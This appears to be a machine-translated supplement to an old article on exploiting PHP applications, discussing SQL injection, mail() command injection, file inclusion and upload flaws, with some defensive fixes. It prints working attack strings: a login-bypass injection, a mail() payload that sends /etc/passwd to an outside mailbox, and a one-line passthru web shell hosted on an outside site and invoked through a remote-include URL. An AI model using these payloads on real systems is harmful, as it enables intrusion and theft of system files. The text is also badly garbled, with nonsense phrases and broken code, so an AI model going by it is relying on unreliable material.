Original: san (little)
A Study In Scarlet - Exploiting Common Vulnerabilities in php Applications
Shaun Clowes article Exploiting Common Vulnerabilities in PHP Applications written really great,
Taking into account a lot of respect, I justthis article, how to add a few other not mentioned. This article focuses on problem-solving, rather than
1, the oldest of the deception SQL statements in the default mode, even if you forget Kaodao php.ini to / usr / local / lib / php.ini under, php or Open
magic_quotes_gpc = on.
This all from the GET / POST / Cookie variables to the single quotes ( '), double quotes ( "), backslash backslash (\) and NUL characters
(the null byte) will be coupled with a backslash in order to be able to query the database.
However, in php-4-RC2, when the introduction of a configuration file php.ini-optimized, this optimization is php.ini
The magic_quotes_gpc = off. Optimized network to see some of the words might have the php.ini-optimized Kaodao
/ usr / local / lib / php.ini, more dangerous at this time. As a relatively simple test, assuming that there is no need to filter the characters:
select * from login where user = '$ HTTP_POST_VARS [user]' and pass = '$ HTTP_POST_VARS [pass]'
We can box and password in the user input box 1 'or 1 ='1 through verified. This is a very antique way, this statement will be replaced by
select * from login where user ='1 'or 1 ='1' and pass ='1 'or 1 ='1'
As or 1 ='1 'to set up, it passed.
The best solution is to filter all unnecessary characters, there is the recommendation from the GET / POST / Cookie to and used in SQL
Plus a variable in a custom function:
function gpc2sql ($ str) (
if (get_magic_quotes_gpc () == 1)
return $ str;
return addslashes ($ str);
Mainly in order to process your security system in a variety of transplantation.
2, mail function parameters in the fifth of the php-4.0.5 time, mail function of the introduction of a fifth parameter, used to set up email in real time for
an additional command line parameters,
But no good SHELL command to check the special characters, so there are big problems to implement the order. Manual as an example:
mail ( "firstname.lastname@example.org", "the subject", $ message, "From: webmaster @ $ SERVER_NAME", "-fwebmaster
@ $ SERVERNAME");
This is a problem, if $ SERVER_NAME =; mail email@example.com </ etc / passwd will be able to machine the password is sent to my mailbox a.
Here to remind you, php manual there are several examples where the existence of security issues, we actually used the time not to copy, it is only
the basic functions of presentation function, to understand it.
The mail function of this problem, the simplest of us do not have the fifth parameter, it is necessary to use the filtering illegal characters such as (;),
as well as modify
php source code of the program package ext / standard / mail.c, in if (extra_cmd! = NULL) (before the addition of the following line:
extra_cmd = NULL
And then recompiled.
3, Unix version of the require, include function
win version of require and include functions that do not support the HTTP and FTP remote file includes, and the UNIX version of the default files are
included to support the long-range.
Whether you require and include what is the extension, you include it as part of the process to implement.
We have written procedures in order to process modular, as well as portability procedures inevitably require the use or include a lot of function,
And sometimes variable as a parameter, such as: include ( "$ something"); if users can control when the parameters $ something, and
this parameter has no filter, then pull off.
First of all, web users can watch any of the files have read permissions, assuming that this process is called http://victim/test.php, so that we can use
url: http://victim/test.php?something=/etc/passwd see / etc / passwd file.
In addition to the use of its remote file include the functions of the Executive order. For example, I www.xfocus.org the establishment of a document
under the test.php, are:
<? passthru ($ cmd)?>, then I can use the following url:
In this way http://victim/test.php?something=http://www.xfocus.org/test.php?cmd=uname run arbitrary commands.
phpMyAdmin is also the emergence of this issue, we can use it to see any of the documents we want to see. Include it in before using file_exist
Function to determine the existence of a document, which does not support file_exist remote files, so the above can not directly use the second
approach. However, we can use the apache log function, the request of a php code with the url, so, something is designated as apache log can also
be the implementation of the order, but the apache log is usually relatively large, have too much clutter information.
Comparison of the methods mentioned http://www.securereality.com.au/sradv00008.txt clever, way to use file upload to the implementation of the
local command script upload, will upload files in the server's temporary directory to produce the php8Ta02I class file name, as a result of the
existence of this document is, therefore, can file_exist function, which documents the implementation of the implementation of upload script.
So include, require the use of function must be careful, especially on documents containing the specified parameters in this way, the parameters
must not be allowed to control the user. Also by modifying the php.ini file to remove the remote file contains this function. This used to php-4.0.3
disable-url-fopen-wrapper in a later version to turn off allow_url_fopen = off.
In php-4.0.1, php.ini in the introduction of a feature disable_functions, this feature more useful, you can use it to prohibit some function.
For example, in the php.ini to include disable_functions = passthru exec system popen then in the implementation of these functions only when
prompted Warning: system () has been disabled for security reasons.
Alas, there is no way but do not order the execution system. Php adopted because the characteristics of a lot of perl, for example, can also be used (
`) to execute the command:
$ output = `ls-al`;
echo "<pre> $ output </ pre>";
The only set safe_mode to avoid, but it is abhorrent safe_mode restrictions on too many other things to do some cumbersome.
5, file upload
php file upload problem http://www.securereality.com.au/sradv00001.html article has described very clearly,
This is a relatively serious problem, in general, we will file to upload directory on the web, so easy access to the system to attack a number of web
users to read documents.
Fortunately, in the php-4.0.3 and later provides the move_uploaded_file function is_uploaded_file. Therefore, more than php-4.0.3 upload procedure
must not use the copy function, instead of using move_uploaded_file, it will check whether the uploaded file. If it is php-4.0.2
And below, it is recommended that a copy before the function:
function is_uploaded_file ($ filename) (
if (! $ tmp_file = get_cfg_var ( 'upload_tmp_dir')) (
$ tmp_file = dirname (tempnam ('',''));
$ tmp_file .='/'. basename ($ filename);
/ * User might have trailing slash in php.ini ... * /
return (ereg_replace ('/+', '/', $ tmp_file) == $ filename);
The focus of this loophole in the security to stay for a long time, but there are many copy verify prior to the Arab-Israeli, Arab-Israeli statement to
determine, so to make it quite difficult to attack, illustrious.
Also, will not use the environment variables, Cookie variables, session variables, such as the relationship between life and death as a judge, because
these variables are too easily forged.
Oh, things are more on-hand, together with the other thought of it slowly, and also welcomes the addition of other comrades arbitrary change.
1, PHP 4 ChangeLog (http://www.php.net/ChangeLog-4.php)
2, A Study In Scarlet - Exploiting Common Vulnerabilities in PHP Applications
(http://www.securereality.com.au/studyinscarlet.txt) and analysist translation.
3, Remote command execution vulnerabilities in phpMyAdmin and phpPgAdmin
About the Author